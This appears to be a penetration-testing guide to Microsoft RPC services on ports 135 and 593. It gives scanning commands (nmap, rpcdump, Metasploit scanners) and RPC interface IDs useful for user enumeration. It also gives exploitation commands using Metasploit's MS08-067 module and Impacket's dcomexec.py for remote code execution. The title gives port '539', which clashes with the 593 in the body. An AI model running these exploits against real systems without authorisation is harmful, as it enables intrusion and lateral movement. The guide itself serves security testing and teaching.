MSRPC - Port 135, 539

Basic info

The Microsoft Remote Procedure Call (MSRPC) protocol is a powerful client-server model enabling one system to request services from another over a network, forming the backbone of many Windows-based network services. Initially derived from open-source software, it was later developed and patented by Microsoft. Exposing MSRPC services, especially on Port 135 (RPC) and Port 593 (RPC over HTTP), creates significant vulnerabilities that penetration testers can exploit for remote code execution, privilege escalation, and lateral movement.

MSRPC allows a program to request a service from a program located on another computer in a network, abstracting the underlying network protocols and allowing cross-platform communication. MSRPC is accessed via various ports, the most common being Port 135 (TCP/UDP) for RPC services, Port 593 (TCP) for RPC over HTTP, and Ports 139/445 (SMB) for SMB-based RPC.

Key Details:

• Port 135 (TCP/UDP): The RPC endpoint mapper listens on this port, which acts as the entry point for locating other RPC services on a system.

• Port 593 (TCP): Used for RPC over HTTP, enabling RPC traffic to bypass network firewalls and proxies.

• Ports 139/445 (TCP): These ports are primarily used by SMB for MSRPC communication.

How MSRPC Works

The process begins when a client application initiates the request for an RPC service. Here's how it works:

• Client Stub: The client invokes a local procedure call (stub).

• Runtime Library: The stub works with the client runtime library to convert the parameters into a standardized format (Network Data Representation).

• Communication: If the server is remote, the runtime library determines the transport protocol (e.g., TCP, HTTP) and sends the request over the network.

The communication is usually secured via authentication mechanisms like NTLM or Kerberos, though these can be bypassed or exploited if misconfigured.

Identifying Exposed RPC Services

Exposing RPC services over the network can be an attack vector if not properly secured. Identifying exposed RPC services is the first step in a pentesting assessment. You can use several tools to discover these services across different ports.

Tools for Scanning RPC Services:

Nmap:

nmap -p 135,593 -sV <target_ip>

Metasploit:

use auxiliary/scanner/dcerpc/endpoint_mapper
use auxiliary/scanner/dcerpc/hidden
use auxiliary/scanner/dcerpc/management
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
rpcdump.py <IP> -p 135

rpcdump:

rpcdump -p 135 <target_ip>

Example output from rpcdump:

D:\rpctools> rpcdump [-p port] <IP>
IFID: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:<IP>[1028]

The rpcdump utility will show Interface Identifiers (IFID) like the LSA and SAMR interfaces, which can be exploited for user enumeration, password cracking, and privilege escalation.

Common RPC Interfaces:

• IFID: 12345778-1234-abcd-ef00-0123456789ab: LSA Interface (used for enumerating users).

• IFID: 3919286a-b10c-11d0-9ba8-00c04fd92ef5: LSA Directory Services (enumerates domains).

• IFID: 12345778-1234-abcd-ef00-0123456789ac: SAMR Interface (used for password brute-forcing).

Executing Remote Code Execution (RCE) with Valid Credentials

Once you've identified the target system with valid credentials, it’s time to exploit the RPC service for Remote Code Execution (RCE). Common vulnerabilities like MS08-067 (RCE through NetAPI) allow attackers to execute code remotely.

Exploitation Techniques:

• Metasploit: Exploits such as MS08-067 can be used to execute arbitrary code on vulnerable machines.

  Copy

  msfconsole
  use exploit/windows/smb/ms08_067_netapi
  set RHOST <target_ip>
  run

• Impacket Framework: Tools like dcomexec.py can execute commands remotely once you have valid credentials.

  Copy

  python dcomexec.py DOMAIN/username:password@<target_ip>

RPC Over HTTP (Port 593)

Port 593 is used for RPC over HTTP, which encapsulates RPC traffic in HTTP requests, allowing it to bypass firewalls and proxies that may block traditional RPC traffic on Port 135. Identifying and exploiting this port requires special tools and techniques.

rpcdump: Can be used to identify services running on Port 593.

rpcdump -p 593 <target_ip>

Metasploit and Impacket:

use exploit/windows/smb/ms08_067_netapi
set RHOST <target_ip>
run